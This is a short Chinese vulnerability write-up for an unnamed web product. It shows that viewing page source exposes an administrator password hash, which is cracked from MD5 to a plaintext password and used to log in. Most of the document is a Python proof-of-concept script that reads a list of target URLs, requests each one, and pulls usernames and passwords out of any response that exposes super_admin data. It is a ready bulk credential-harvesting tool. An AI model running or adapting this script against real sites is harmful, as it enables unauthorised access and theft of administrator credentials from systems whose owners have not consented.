漏洞演示
访问地址
f12查看源代码
md5解码:
md5加密 | 解码 |
---|---|
40b5daa2352b825d66b8080617408284 | reach123 |
登录成功
poc/exp验证
import requests
import re
def start(headers):
with open("1.txt", "r") as f:
for f1 in f:
f2 = f1.strip()
try:
response = requests.get(url=f2, headers=headers)
start1(response,f2)
except Exception as e:
print("[-]"+f2+"[+]"+"错误")
def start1(response,f2):
if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
print("[-]" + f2 + "存在该漏洞"+ "[+]")
html = response.text
html1 = re.findall('.name":"(.*?)"', html)
html2 = re.findall('.password":"(.*?)"', html)
print(list(filter(None, html1)))
print(list(filter(None, html2)))
print("-" * 110)
else:
print("[-]" + f2 + "[+]" + "不存在该漏洞")
if __name__ == '__main__':
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
}
start(headers)